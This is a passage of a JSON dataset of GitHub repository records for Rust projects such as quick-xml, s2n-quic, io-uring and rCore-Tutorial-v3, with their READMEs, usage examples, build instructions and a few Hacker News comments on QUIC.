{"data": [{"name": "tafia/quick-xml", "link": "https://github.com/tafia/quick-xml", "tags": ["xml-parser", "writer", "serialization", "deserialization", "html", "xml", "pull-parser", "performance-xml"], "stars": 834, "description": "Rust high performance xml reader and writer", "lang": "Rust", "repo_lang": "", "readme": "# quick-xml\n\n![status](https://github.com/tafia/quick-xml/actions/workflows/rust.yml/badge.svg)\n[![Crate](https://img.shields.io/crates/v/quick-xml.svg)](https://crates.io/crates/quick-xml)\n[![docs.rs](https://docs.rs/quick-xml/badge.svg)](https://docs.rs/quick-xml)\n[![codecov](https://img.shields.io/codecov/c/github/tafia/quick-xml)](https://codecov.io/gh/tafia/quick-xml)\n[![MSRV](https://img.shields.io/badge/rustc-1.52.0+-ab6000.svg)](https://blog.rust-lang.org/2021/05/06/Rust-1.52.0.html)\n\nHigh performance xml pull reader/writer.\n\nThe reader:\n- is almost zero-copy (use of `Cow` whenever possible)\n- is easy on memory allocation (the API provides a way to reuse buffers)\n- support various encoding (with `encoding` feature), namespaces resolution, special characters.\n\nSyntax is inspired by [xml-rs](https://github.com/netvl/xml-rs).\n\n## Example\n\n### Reader\n\n```rust\nuse quick_xml::events::Event;\nuse quick_xml::reader::Reader;\n\nlet xml = r#\"\n Test\n Test 2\n \"#;\nlet mut reader = Reader::from_str(xml);\nreader.trim_text(true);\n\nlet mut count = 0;\nlet mut txt = Vec::new();\nlet mut buf = Vec::new();\n\n// The `Reader` does not implement `Iterator` because it outputs borrowed data (`Cow`s)\nloop {\n // NOTE: this is the generic case when we don't know about the input BufRead.\n // when the input is a &str or a &[u8], we don't actually need to use another\n // buffer, we could directly call `reader.read_event()`\n match reader.read_event_into(&mut buf) {\n Err(e) => panic!(\"Error at position {}: {:?}\", reader.buffer_position(), e),\n // exits the loop when reaching end of file\n Ok(Event::Eof) => break,\n\n Ok(Event::Start(e)) => {\n match e.name().as_ref() {\n b\"tag1\" => println!(\"attributes values: {:?}\",\n e.attributes().map(|a| a.unwrap().value)\n .collect::>()),\n b\"tag2\" => count += 1,\n _ => (),\n }\n }\n Ok(Event::Text(e)) => txt.push(e.unescape().unwrap().into_owned()),\n\n // There are several other `Event`s we do not consider here\n _ => (),\n }\n // if we don't keep a borrow elsewhere, we can clear the buffer to keep memory usage low\n buf.clear();\n}\n```\n\n### Writer\n\n```rust\nuse quick_xml::events::{Event, BytesEnd, BytesStart};\nuse quick_xml::reader::Reader;\nuse quick_xml::writer::Writer;\nuse std::io::Cursor;\n\nlet xml = r#\"text\"#;\nlet mut reader = Reader::from_str(xml);\nreader.trim_text(true);\nlet mut writer = Writer::new(Cursor::new(Vec::new()));\nloop {\n match reader.read_event() {\n Ok(Event::Start(e)) if e.name().as_ref() == b\"this_tag\" => {\n\n // crates a new element ... 
alternatively we could reuse `e` by calling\n // `e.into_owned()`\n let mut elem = BytesStart::new(\"my_elem\");\n\n // collect existing attributes\n elem.extend_attributes(e.attributes().map(|attr| attr.unwrap()));\n\n // add a new my-key=\"some value\" attribute\n elem.push_attribute((\"my-key\", \"some value\"));\n\n // writes the event to the writer\n assert!(writer.write_event(Event::Start(elem)).is_ok());\n },\n Ok(Event::End(e)) if e.name().as_ref() == b\"this_tag\" => {\n assert!(writer.write_event(Event::End(BytesEnd::new(\"my_elem\"))).is_ok());\n },\n Ok(Event::Eof) => break,\n // we can either move or borrow the event to write, depending on your use-case\n Ok(e) => assert!(writer.write_event(e).is_ok()),\n Err(e) => panic!(\"Error at position {}: {:?}\", reader.buffer_position(), e),\n }\n}\n\nlet result = writer.into_inner().into_inner();\nlet expected = r#\"<my_elem k1=\"v1\" k2=\"v2\" my-key=\"some value\"><child>text</child></my_elem>\"#;\nassert_eq!(result, expected.as_bytes());\n```\n\n## Serde\n\nWhen using the `serialize` feature, quick-xml can be used with serde's `Serialize`/`Deserialize` traits.\nThe mapping between XML and Rust types, and in particular the syntax that allows you to specify the\ndistinction between *elements* and *attributes*, is described in detail in the documentation\nfor [deserialization](https://docs.rs/quick-xml/latest/quick_xml/de/).\n\n### Credits\n\nThis has largely been inspired by [serde-xml-rs](https://github.com/RReverser/serde-xml-rs).\nquick-xml follows its convention for deserialization, including the\n[`$value`](https://github.com/RReverser/serde-xml-rs#parsing-the-value-of-a-tag) special name.\n\n### Parsing the \"value\" of a tag\n\nIf you have an input of the form `<foo abc=\"xyz\">bar</foo>`, and you want to get at the `bar`,\nyou can use either the special name `$text`, or the special name `$value`:\n\n```rust,ignore\nstruct Foo {\n #[serde(rename = \"@abc\")]\n pub abc: String,\n #[serde(rename = \"$text\")]\n pub body: String,\n}\n```\n\nRead about the difference in the [documentation](https://docs.rs/quick-xml/latest/quick_xml/de/index.html#difference-between-text-and-value-special-names).\n\n
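A complete deserialization of that shape might look like this (a minimal sketch assuming the `serialize` feature plus serde's `derive` feature; the element name `foo` and its values are illustrative):\n\n```rust\nuse quick_xml::de::from_str;\nuse serde::Deserialize;\n\n#[derive(Debug, Deserialize)]\nstruct Foo {\n    #[serde(rename = \"@abc\")]\n    pub abc: String,\n    #[serde(rename = \"$text\")]\n    pub body: String,\n}\n\nfn main() {\n    // `@abc` maps to the attribute, `$text` to the element's text content\n    let foo: Foo = from_str(r#\"<foo abc=\"xyz\">bar</foo>\"#).unwrap();\n    assert_eq!(foo.abc, \"xyz\");\n    assert_eq!(foo.body, \"bar\");\n}\n```\n\n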
### Performance\n\nNote that despite the serde implementation not focusing on performance (there are several unnecessary copies), it remains about 10x faster than serde-xml-rs.\n\n# Features\n\n- `encoding`: support for non-UTF-8 XML documents\n- `serialize`: support for serde `Serialize`/`Deserialize`\n\n## Performance\n\nBenchmarking is hard and the results depend on your input file and your machine.\n\nHere on my particular file, quick-xml is around **50 times faster** than the [xml-rs](https://crates.io/crates/xml-rs) crate.\n\n```\n// quick-xml benches\ntest bench_quick_xml ... bench: 198,866 ns/iter (+/- 9,663)\ntest bench_quick_xml_escaped ... bench: 282,740 ns/iter (+/- 61,625)\ntest bench_quick_xml_namespaced ... bench: 389,977 ns/iter (+/- 32,045)\n\n// same bench with xml-rs\ntest bench_xml_rs ... bench: 14,468,930 ns/iter (+/- 321,171)\n\n// serde-xml-rs vs serialize feature\ntest bench_serde_quick_xml ... bench: 1,181,198 ns/iter (+/- 138,290)\ntest bench_serde_xml_rs ... bench: 15,039,564 ns/iter (+/- 783,485)\n```\n\nFor a feature and performance comparison, you can also have a look at RazrFalcon's [parser comparison table](https://github.com/RazrFalcon/roxmltree#parsing).\n\n## Contribute\n\nAny PR is welcome!\n\n## License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "y-crdt/y-crdt", "link": "https://github.com/y-crdt/y-crdt", "tags": ["yjs", "crdt", "rust"], "stars": 833, "description": "Rust port of Yjs", "lang": "Rust", "repo_lang": "", "readme": "# Y CRDT\n


\n\nA collection of Rust libraries oriented around implementing [Yjs](https://yjs.dev/) algorithm and protocol with cross-language and cross-platform support in mind. It aims to maintain behavior and binary protocol compatibility with Yjs, therefore projects using Yjs/Yrs should be able to interoperate with each other.\n\nProject organization:\n\n- **lib0** is a serialization library used for efficient (and fairly fast) data exchange.\n- **yrs** (read: *wires*) is a core Rust library, a foundation stone for other projects.\n- **yffi** (read: *wifi*) is a wrapper around *yrs* use to provide a native C foreign function interface. See also: [C header file](https://github.com/y-crdt/y-crdt/blob/main/tests-ffi/include/libyrs.h).\n- **ywasm** is a wrapper around *yrs* that targets Web Assembly and JavaScript API.\n\nOther projects using *yrs*:\n\n- [ypy](https://github.com/y-crdt/ypy) - Python bindings.\n- [yrb](https://github.com/y-crdt/yrb) - Ruby bindings.\n\n## Feature parity with Yjs project\n\n- Supported collaborative types:\n - [x] Text\n - [x] text insertion (with variable offsets including configurable UTF-8, UTF-16 and UTF-32 mappings)\n - [x] embedded elements insertion\n - [x] insertion of formatting attributes\n - [x] observe events and deltas\n - [x] Map\n - [x] insertion, update and removal of primitive JSON-like elements\n - [x] recursive insertion, update and removal of other collaborative elements of any type\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] Array\n - [x] insertion and removal of primitive JSON-like elements\n - [x] recursive insertion of other collaborative elements of any type\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] move index positions\n - [x] XmlElement\n - [x] insertion, update and removal of XML attributes\n - [x] insertion, update and removal of XML children nodes\n - [x] observe events and deltas\n - [x] deep observe events bubbling up from nested collections\n - [x] XmlText\n - [x] insertion, update and removal of XML attributes\n - [x] text insertion (with variable offsets including configurable UTF-8, UTF-16 and UTF-32 mappings)\n - [x] observe events and deltas\n - [x] XmlFragment\n - [x] XmlHook (*deprecated*)\n - [x] Sub documents\n - [x] Transaction origin\n - [x] Undo/redo manager\n- Encoding formats:\n - [x] lib0 v1 encoding\n - [x] lib0 v2 encoding\n- Transaction events:\n - [x] on event update\n - [x] on after transaction\n\n## Maintainers\n\n- [Bartosz Sypytkowski](https://github.com/Horusiath)\n- [Kevin Jahns](https://github.com/dmonad)\n- [John Waidhofer](https://github.com/Waidhoferj)\n\n## Sponsors\n\n[![NLNET](https://nlnet.nl/image/logo_nlnet.svg)](https://nlnet.nl/)\n\n[![Ably](https://ably.com/assets/ably_ui/core/images/ably-logo-ad51bb21f40afd34a70df857594d6b7b84f6ceca0518f1d4d94e2b9579486351.png)](https://ably.com/)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-num/num", "link": "https://github.com/rust-num/num", "tags": ["rust", "number", "trait", "numeric-types", "num"], "stars": 833, "description": "A collection of numeric types and traits for Rust.", "lang": "Rust", "repo_lang": "", "readme": "# num\n\n[![crate](https://img.shields.io/crates/v/num.svg)](https://crates.io/crates/num)\n[![documentation](https://docs.rs/num/badge.svg)](https://docs.rs/num)\n[![minimum rustc 
1.31](https://img.shields.io/badge/rustc-1.31+-red.svg)](https://rust-lang.github.io/rfcs/2495-min-rust-version.html)\n[![build status](https://github.com/rust-num/num/workflows/master/badge.svg)](https://github.com/rust-num/num/actions)\n\nA collection of numeric types and traits for Rust.\n\nThis includes new types for big integers, rationals (aka fractions), and complex numbers,\nnew traits for generic programming on numeric properties like `Integer`,\nand generic range iterators.\n\n`num` is a meta-crate, re-exporting items from these sub-crates:\n\n| Repository | Crate | Documentation |\n| ---------- | ----- | ------------- |\n| [`num-bigint`] | [![crate][bigint-cb]][bigint-c] | [![documentation][bigint-db]][bigint-d]\n| [`num-complex`] | [![crate][complex-cb]][complex-c] | [![documentation][complex-db]][complex-d]\n| [`num-integer`] | [![crate][integer-cb]][integer-c] | [![documentation][integer-db]][integer-d]\n| [`num-iter`] | [![crate][iter-cb]][iter-c] | [![documentation][iter-db]][iter-d]\n| [`num-rational`] | [![crate][rational-cb]][rational-c] | [![documentation][rational-db]][rational-d]\n| [`num-traits`] | [![crate][traits-cb]][traits-c] | [![documentation][traits-db]][traits-d]\n| ([`num-derive`]) | [![crate][derive-cb]][derive-c] | [![documentation][derive-db]][derive-d]\n\nNote: `num-derive` is listed here for reference, but it's not directly included\nin `num`. This is a `proc-macro` crate for deriving some of `num`'s traits.\n\n## Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nnum = \"0.4\"\n```\n\n## Features\n\nThis crate can be used without the standard library (`#![no_std]`) by disabling\nthe default `std` feature. Use this in `Cargo.toml`:\n\n```toml\n[dependencies.num]\nversion = \"0.4\"\ndefault-features = false\n```\n\nThe `num-bigint` crate requires the `std` feature, or the `alloc` feature may\nbe used instead with Rust 1.36 and later. Other sub-crates may also have\nlimited functionality when used without `std`.\n\nThe `libm` feature uses pure-Rust floating point implementations in `no_std`\nbuilds, enabling the `Float` trait and related `Complex` methods.\n\nThe `rand` feature enables randomization traits in `num-bigint` and\n`num-complex`.\n\nThe `serde` feature enables serialization for types in `num-bigint`,\n`num-complex`, and `num-rational`.\n\nThe `num` meta-crate no longer supports features to toggle the inclusion of\nthe individual sub-crates. 
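If you only need a few of the sub-crates, they can be depended on directly; for example, a project using only big integers and the generic traits might declare (versions here are illustrative):\n\n```toml\n[dependencies]\nnum-bigint = \"0.4\"\nnum-traits = \"0.2\"\n```\n\n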
If you need such control, you are recommended to\ndirectly depend on your required crates instead.\n\n## Releases\n\nRelease notes are available in [RELEASES.md](RELEASES.md).\n\n## Compatibility\n\nThe `num` crate as a whole is tested for rustc 1.31 and greater.\n\nThe `num-traits`, `num-integer`, and `num-iter` crates are individually tested\nfor rustc 1.8 and greater, if you require such older compatibility.\n\n## License\n\nLicensed under either of\n\n * [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)\n * [MIT license](http://opensource.org/licenses/MIT)\n\nat your option.\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\n\n[`num-bigint`]: https://github.com/rust-num/num-bigint\n[bigint-c]: https://crates.io/crates/num-bigint\n[bigint-cb]: https://img.shields.io/crates/v/num-bigint.svg\n[bigint-d]: https://docs.rs/num-bigint/\n[bigint-db]: https://docs.rs/num-bigint/badge.svg\n\n[`num-complex`]: https://github.com/rust-num/num-complex\n[complex-c]: https://crates.io/crates/num-complex\n[complex-cb]: https://img.shields.io/crates/v/num-complex.svg\n[complex-d]: https://docs.rs/num-complex/\n[complex-db]: https://docs.rs/num-complex/badge.svg\n\n[`num-derive`]: https://github.com/rust-num/num-derive\n[derive-c]: https://crates.io/crates/num-derive\n[derive-cb]: https://img.shields.io/crates/v/num-derive.svg\n[derive-d]: https://docs.rs/num-derive/\n[derive-db]: https://docs.rs/num-derive/badge.svg\n\n[`num-integer`]: https://github.com/rust-num/num-integer\n[integer-c]: https://crates.io/crates/num-integer\n[integer-cb]: https://img.shields.io/crates/v/num-integer.svg\n[integer-d]: https://docs.rs/num-integer/\n[integer-db]: https://docs.rs/num-integer/badge.svg\n\n[`num-iter`]: https://github.com/rust-num/num-iter\n[iter-c]: https://crates.io/crates/num-iter\n[iter-cb]: https://img.shields.io/crates/v/num-iter.svg\n[iter-d]: https://docs.rs/num-iter/\n[iter-db]: https://docs.rs/num-iter/badge.svg\n\n[`num-rational`]: https://github.com/rust-num/num-rational\n[rational-c]: https://crates.io/crates/num-rational\n[rational-cb]: https://img.shields.io/crates/v/num-rational.svg\n[rational-d]: https://docs.rs/num-rational/\n[rational-db]: https://docs.rs/num-rational/badge.svg\n\n[`num-traits`]: https://github.com/rust-num/num-traits\n[traits-c]: https://crates.io/crates/num-traits\n[traits-cb]: https://img.shields.io/crates/v/num-traits.svg\n[traits-d]: https://docs.rs/num-traits/\n[traits-db]: https://docs.rs/num-traits/badge.svg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aws/s2n-quic", "link": "https://github.com/aws/s2n-quic", "tags": ["quic", "rust", "cryptography", "s2n"], "stars": 833, "description": "An implementation of the IETF QUIC protocol", "lang": "Rust", "repo_lang": "", "readme": "# s2n-quic\n\n`s2n-quic` is a Rust implementation of the [IETF QUIC protocol](https://quicwg.org/), featuring:\n\n- a simple, easy-to-use API. 
See [an example](https://github.com/aws/s2n-quic/blob/main/examples/echo/src/bin/quic_echo_server.rs) of an s2n-quic echo server built with just a few API calls\n- high configurability using [providers](https://docs.rs/s2n-quic/latest/s2n_quic/provider/index.html) for granular control of functionality\n- extensive automated testing, including fuzz testing, integration testing, unit testing, snapshot testing, efficiency testing, performance benchmarking, interoperability testing and [more](https://github.com/aws/s2n-quic/blob/main/docs/ci.md)\n- integration with [s2n-tls](https://github.com/aws/s2n-tls), AWS's simple, small, fast and secure TLS implementation, as well as [rustls](https://crates.io/crates/rustls)\n- thorough [compliance coverage tracking](https://github.com/aws/s2n-quic/blob/main/docs/ci.md#compliance) of normative language in relevant standards\n- and much more, including [CUBIC congestion controller](https://www.rfc-editor.org/rfc/rfc8312.html) support, [packet pacing](https://www.rfc-editor.org/rfc/rfc9002.html#name-pacing), [Generic Segmentation Offload](https://lwn.net/Articles/188489/) support, [Path MTU discovery](https://www.rfc-editor.org/rfc/rfc8899.html), and unique [connection identifiers](https://www.rfc-editor.org/rfc/rfc9000.html#name-connection-id) detached from the address\n\nSee the [API documentation](https://docs.rs/s2n-quic) and [examples](https://github.com/aws/s2n-quic/tree/main/examples) to get started with `s2n-quic`.\n\n[![Crates.io][crates-badge]][crates-url]\n[![docs.rs][docs-badge]][docs-url]\n[![Apache 2.0 Licensed][license-badge]][license-url]\n[![Build Status][actions-badge]][actions-url]\n[![Dependencies][dependencies-badge]][dependencies-url]\n[![MSRV][msrv-badge]][msrv-url]\n\n## Installation\n\n`s2n-quic` is available on `crates.io` and can be added to a project like so:\n\n```toml\n[dependencies]\ns2n-quic = \"1\"\n```\n\n**NOTE**: On unix-like systems, [`s2n-tls`](https://github.com/aws/s2n-tls) will be used as the default TLS provider and requires a C compiler to be installed.\n\n## Example\n\nThe following implements a basic echo server and client. The client connects to the server and pipes its `stdin` on a stream. The server listens for new streams and pipes any data it receives back to the client. 
The client will then pipe all stream data to `stdout`.\n\n### Server\n\n```rust\n// src/bin/server.rs\nuse s2n_quic::Server;\nuse std::error::Error;\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn Error>> {\n let mut server = Server::builder()\n .with_tls((\"./path/to/cert.pem\", \"./path/to/key.pem\"))?\n .with_io(\"127.0.0.1:4433\")?\n .start()?;\n\n while let Some(mut connection) = server.accept().await {\n // spawn a new task for the connection\n tokio::spawn(async move {\n while let Ok(Some(mut stream)) = connection.accept_bidirectional_stream().await {\n // spawn a new task for the stream\n tokio::spawn(async move {\n // echo any data back to the stream\n while let Ok(Some(data)) = stream.receive().await {\n stream.send(data).await.expect(\"stream should be open\");\n }\n });\n }\n });\n }\n\n Ok(())\n}\n```\n\n### Client\n\n```rust\n// src/bin/client.rs\nuse s2n_quic::{client::Connect, Client};\nuse std::{error::Error, net::SocketAddr};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn Error>> {\n let client = Client::builder()\n // CERT_PEM is the server's certificate as a PEM string, defined elsewhere\n .with_tls(CERT_PEM)?\n .with_io(\"0.0.0.0:0\")?\n .start()?;\n\n let addr: SocketAddr = \"127.0.0.1:4433\".parse()?;\n let connect = Connect::new(addr).with_server_name(\"localhost\");\n let mut connection = client.connect(connect).await?;\n\n // ensure the connection doesn't time out with inactivity\n connection.keep_alive(true)?;\n\n // open a new stream and split the receiving and sending sides\n let stream = connection.open_bidirectional_stream().await?;\n let (mut receive_stream, mut send_stream) = stream.split();\n\n // spawn a task that copies responses from the server to stdout\n tokio::spawn(async move {\n let mut stdout = tokio::io::stdout();\n let _ = tokio::io::copy(&mut receive_stream, &mut stdout).await;\n });\n\n // copy data from stdin and send it to the server\n let mut stdin = tokio::io::stdin();\n tokio::io::copy(&mut stdin, &mut send_stream).await?;\n\n Ok(())\n}\n```\n\n## Minimum Supported Rust Version (MSRV)\n\n`s2n-quic` will maintain a rolling MSRV (minimum supported rust version) policy of at least 6 months. The current s2n-quic version is not guaranteed to build on Rust versions earlier than the MSRV.\n\nThe current MSRV is [1.60.0][msrv-url].\n\n## Security issue notifications\n\nIf you discover a potential security issue in s2n-quic we ask that you notify\nAWS Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public github issue.\n\nIf you package or distribute s2n-quic, or use s2n-quic as part of a large multi-user service, you may be eligible for pre-notification of future s2n-quic releases. 
Please contact s2n-pre-notification@amazon.com.\n\n## License\n\nThis project is licensed under the [Apache-2.0 License][license-url].\n\n[crates-badge]: https://img.shields.io/crates/v/s2n-quic.svg\n[crates-url]: https://crates.io/crates/s2n-quic\n[license-badge]: https://img.shields.io/badge/license-apache-blue.svg\n[license-url]: https://aws.amazon.com/apache-2-0/\n[actions-badge]: https://github.com/aws/s2n-quic/workflows/ci/badge.svg\n[actions-url]: https://github.com/aws/s2n-quic/actions/workflows/ci.yml?query=branch%3Amain\n[docs-badge]: https://img.shields.io/docsrs/s2n-quic.svg\n[docs-url]: https://docs.rs/s2n-quic\n[dependencies-badge]: https://img.shields.io/librariesio/release/cargo/s2n-quic.svg\n[dependencies-url]: https://crates.io/crates/s2n-quic/dependencies\n[msrv-badge]: https://img.shields.io/badge/MSRV-1.60.0-green\n[msrv-url]: https://blog.rust-lang.org/2022/04/07/Rust-1.60.0.html\n", "readme_type": "markdown", "hn_comments": "there's a bunch of bullet points going through some staple material, but the last bullet point has some absurdly good high grade features!> and much more, including CUBIC congestion controller support, packet pacing, Generic Segmentation Offload support, Path MTU discovery, and unique connection identifiers detached from the addressalso, a blog announcement appeared for this, https://aws.amazon.com/blogs/security/introducing-s2n-quic-o...Is there a \"can I use\" for networks/middleboxes/etc and the problems that arise with them, that talks about the real-world aspects of trying to use QUIC universally?I'd love to use QUIC between a (non-browser) client and server for which both ends are code I've written, without having to have fallbacks to HTTP/1.1 or HTTP/2. (Among other things, I love the idea of just establishing one connection and using it for two-way communication, without worrying about things like WebSocket.)However, the client also needs to run in random places, and while it doesn't necessarily need to support hostile networks, it does need to support broken networks, which to a first approximation can be similar.Are there statistics available for whether and how often QUIC (or more generally UDP) works with:- Random ISPs of varying quality\n- Cell data connections\n- Shops and airports and similar, which commonly use captive portals and try to intercept traffic when they shouldn't, and come pretty close to being hostile networks\n- Vaguely reasonable corporate networks, that aren't trying to block QUIC but might do so through misconfiguration or through some misguided policy put in place for unrelated reasons (e.g \"our firewall rules are written about TCP and just drop all UDP and ICMP, and people complain but nobody with the power to change it\")\n- Somewhat less reasonable corporate networks, that force everything through a proxy and may require things like CONNECT-UDP or SOCKS, but still aren't actively trying to block QUICI'm hoping that efforts like fly.io's userspace wireguard stack (which uses UDP) might have data here.I'm specifically not asking about the case of networks that are actually trying to be hostile (to QUIC or otherwise), both because such networks may break any number of things including TLS or WebSockets, and because I'd like to avoid restarting the recurring discussion about whether QUIC/etc are a conspiracy to disempower network administrators. 
I'd love to know the statistics there too, though, if they're available.I'm also curious about the best-known method to reliably and efficiently tunnel QUIC out of a network within a client, for the purposes of separating always-QUIC logic from weird-network-handling logic. Does it make sense, for instance, to have a standard way to tunnel a secure QUIC connection through an insecure TCP connection?https://github.com/quinn-rs/quinnWill there be any available public endpoints to benchmark AWS' H3 implementation?On top of that, will Twitch and Prime Video use this library for their QUIC rollout?Why should I use this library over quiche or Quinn?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tokio-rs/io-uring", "link": "https://github.com/tokio-rs/io-uring", "tags": ["linux", "io-uring", "rust-lang"], "stars": 832, "description": "The `io_uring` library for Rust", "lang": "Rust", "repo_lang": "", "readme": "# Linux IO Uring\n[![github actions](https://github.com/tokio-rs/io-uring/workflows/ci/badge.svg)](https://github.com/tokio-rs/io-uring/actions)\n[![crates](https://img.shields.io/crates/v/io-uring.svg)](https://crates.io/crates/io-uring)\n[![license](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/tokio-rs/io-uring/blob/master/LICENSE-MIT)\n[![license](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/tokio-rs/io-uring/blob/master/LICENSE-APACHE)\n[![docs.rs](https://docs.rs/io-uring/badge.svg)](https://docs.rs/io-uring/)\n\nThe low-level [`io_uring`](https://kernel.dk/io_uring.pdf) userspace interface for Rust.\n\n## Usage\n\nTo use `io-uring` crate, first add this to your `Cargo.toml`:\n\n```toml\n[dependencies]\nio-uring = \"0.5\"\n```\n\nNext we can start using `io-uring` crate.\nThe following is quick introduction using `Read` for file.\n\n```rust\nuse io_uring::{opcode, types, IoUring};\nuse std::os::unix::io::AsRawFd;\nuse std::{fs, io};\n\nfn main() -> io::Result<()> {\n let mut ring = IoUring::new(8)?;\n\n let fd = fs::File::open(\"README.md\")?;\n let mut buf = vec![0; 1024];\n\n let read_e = opcode::Read::new(types::Fd(fd.as_raw_fd()), buf.as_mut_ptr(), buf.len() as _)\n .build()\n .user_data(0x42);\n\n // Note that the developer needs to ensure\n // that the entry pushed into submission queue is valid (e.g. 
fd, buffer).\n unsafe {\n ring.submission()\n .push(&read_e)\n .expect(\"submission queue is full\");\n }\n\n ring.submit_and_wait(1)?;\n\n let cqe = ring.completion().next().expect(\"completion queue is empty\");\n\n assert_eq!(cqe.user_data(), 0x42);\n assert!(cqe.result() >= 0, \"read error: {}\", cqe.result());\n\n Ok(())\n}\n```\n\nNote that opcode `Read` is only available after kernel 5.6.\nIf you use a kernel lower than 5.6, this example will fail.\n\n## Test and Benchmarks\n\nYou can run the test and benchmark of the library with the following commands.\n\n```\n$ cargo run --package io-uring-test\n$ cargo bench --package io-uring-bench\n```\n\n\n### License\n\nThis project is licensed under either of\n\n * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or\n http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or\n http://opensource.org/licenses/MIT)\n\nat your option.\n\n\n### Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in io-uring by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rcore-os/rCore-Tutorial-v3", "link": "https://github.com/rcore-os/rCore-Tutorial-v3", "tags": ["rust", "risc-v", "rcore", "operating-system", "k210"], "stars": 831, "description": "Let's write an OS which can run on RISC-V in Rust from scratch!", "lang": "Rust", "repo_lang": "", "readme": "# rCore-Tutorial-v3\nrCore-Tutorial version 3.6. See the [Documentation in Chinese](https://rcore-os.github.io/rCore-Tutorial-Book-v3/).\n\nrCore-Tutorial API Docs. See the [API Docs of Ten OSes ](#OS-API-DOCS)\n\nIf you don't know Rust Language and try to learn it, please visit [Rust Learning Resources](https://github.com/rcore-os/rCore/wiki/study-resource-of-system-programming-in-RUST)\n\nOfficial QQ group number: 735045051\n\n## news\n- 23/06/2022: Version 3.6.0 is on the way! 
Now we directly update the code on chX branches, please periodically check if there are any updates.\n\n## Overview\n\nThis project aims to show how to write an **Unix-like OS** running on **RISC-V** platforms **from scratch** in **[Rust](https://www.rust-lang.org/)** for **beginners** without any background knowledge about **computer architectures, assembly languages or operating systems**.\n\n## Features\n\n* Platform supported: `qemu-system-riscv64` simulator or dev boards based on [Kendryte K210 SoC](https://canaan.io/product/kendryteai) such as [Maix Dock](https://www.seeedstudio.com/Sipeed-MAIX-Dock-p-4815.html)\n* OS\n * concurrency of multiple processes each of which contains mutiple native threads\n * preemptive scheduling(Round-Robin algorithm)\n * dynamic memory management in kernel\n * virtual memory\n * a simple file system with a block cache\n * an interactive shell in the userspace\n* **only 4K+ LoC**\n* [A detailed documentation in Chinese](https://rcore-os.github.io/rCore-Tutorial-Book-v3/) in spite of the lack of comments in the code(English version is not available at present)\n\n## Prerequisites\n\n### Install Rust\n\nSee [official guide](https://www.rust-lang.org/tools/install).\n\nInstall some tools:\n\n```sh\n$ rustup target add riscv64gc-unknown-none-elf\n$ cargo install cargo-binutils --vers =0.3.3\n$ rustup component add llvm-tools-preview\n$ rustup component add rust-src\n```\n\n### Install Qemu\n\nHere we manually compile and install Qemu 7.0.0. For example, on Ubuntu 18.04:\n\n```sh\n# install dependency packages\n$ sudo apt install autoconf automake autotools-dev curl libmpc-dev libmpfr-dev libgmp-dev \\\n gawk build-essential bison flex texinfo gperf libtool patchutils bc \\\n zlib1g-dev libexpat-dev pkg-config libglib2.0-dev libpixman-1-dev git tmux python3 python3-pip ninja-build\n# download Qemu source code\n$ wget https://download.qemu.org/qemu-7.0.0.tar.xz\n# extract to qemu-7.0.0/\n$ tar xvJf qemu-7.0.0.tar.xz\n$ cd qemu-7.0.0\n# build\n$ ./configure --target-list=riscv64-softmmu,riscv64-linux-user\n$ make -j$(nproc)\n```\n\nThen, add following contents to `~/.bashrc`(please adjust these paths according to your environment):\n\n```\nexport PATH=$PATH:/path/to/qemu-7.0.0/build\n```\n\nFinally, update the current shell:\n\n```sh\n$ source ~/.bashrc\n```\n\nNow we can check the version of Qemu:\n\n```sh\n$ qemu-system-riscv64 --version\nQEMU emulator version 7.0.0\nCopyright (c) 2003-2020 Fabrice Bellard and the QEMU Project developers\n```\n\n### Install RISC-V GNU Embedded Toolchain(including GDB)\n\nDownload the compressed file according to your platform From [Sifive website](https://www.sifive.com/software)(Ctrl+F 'toolchain').\n\nExtract it and append the location of the 'bin' directory under its root directory to `$PATH`.\n\nFor example, we can check the version of GDB:\n\n```sh\n$ riscv64-unknown-elf-gdb --version\nGNU gdb (SiFive GDB-Metal 10.1.0-2020.12.7) 10.1\nCopyright (C) 2020 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n```\n\n### Install serial tools(Optional, if you want to run on K210)\n\n```sh\n$ pip3 install pyserial\n$ sudo apt install python3-serial\n```\n\n## Run our project\n\n### Qemu\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ make run\n```\n\nAfter outputing some debug messages, the kernel lists all the applications 
